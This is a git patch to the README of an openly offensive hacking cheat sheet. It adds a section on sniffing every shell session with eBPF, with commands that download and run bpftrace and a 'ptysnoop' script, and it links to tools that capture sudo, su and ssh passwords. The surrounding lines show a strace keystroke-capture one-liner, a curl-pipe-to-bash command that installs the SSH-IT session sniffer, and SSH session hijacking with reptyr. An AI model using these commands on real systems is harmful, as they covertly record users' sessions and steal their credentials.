From 376095318ae0d56f5f1b08f1e8884e76b085c884 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 13 Nov 2023 19:48:45 +0000
Subject: [PATCH] Update README.md
---
README.md | 22 ++++++++++++++++++----
1 file changed, 18 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index c636be4..c530af2 100644
--- a/README.md
+++ b/README.md
@@ -87,6 +87,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [SSH session sniffing and hijacking](#ssh-sniffing)
1. [Sniff a user's SHELL session with script](#ssh-sniffing-script)
2. [Sniff all SHELL sessions with dtrace](#dtrace)
+ 2. [Sniff all SHELL sessions with eBPF](#bpf)
1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace)
1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper)
1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit)
@@ -1716,8 +1717,21 @@ Start a dtrace and log to /tmp/.log:
(dtrace -sd >/tmp/.log &)
```
+
+**9.iii Sniff all SHELL sessions with eBPF**
+
+eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux.
+
+```sh
+curl -o bpftrace -fsSL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace
+chmod 755 bpftrace
+curl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/ptysnoop.bt
+./bpftrace -Bnone ptysnoop.bt
+```
+Check out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://github.com/hackerschoice/bpfhacks).
+
-**9.iii Sniff a user's outgoing SSH session with strace**
+**9.iv Sniff a user's outgoing SSH session with strace**
```sh
strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
```
@@ -1725,7 +1739,7 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a
-**9.iv. Sniff a user's outgoing SSH session with a wrapper script**
+**9.v. Sniff a user's outgoing SSH session with a wrapper script**
Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions)
@@ -1771,7 +1785,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m
The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.
-**9.v Sniff a user's outgoing SSH session using SSH-IT**
+**9.vi Sniff a user's outgoing SSH session using SSH-IT**
The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/).
@@ -1780,7 +1794,7 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"
```
-**9.vi Hijack / Take-over a running SSH session**
+**9.vii Hijack / Take-over a running SSH session**
Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session:
```sh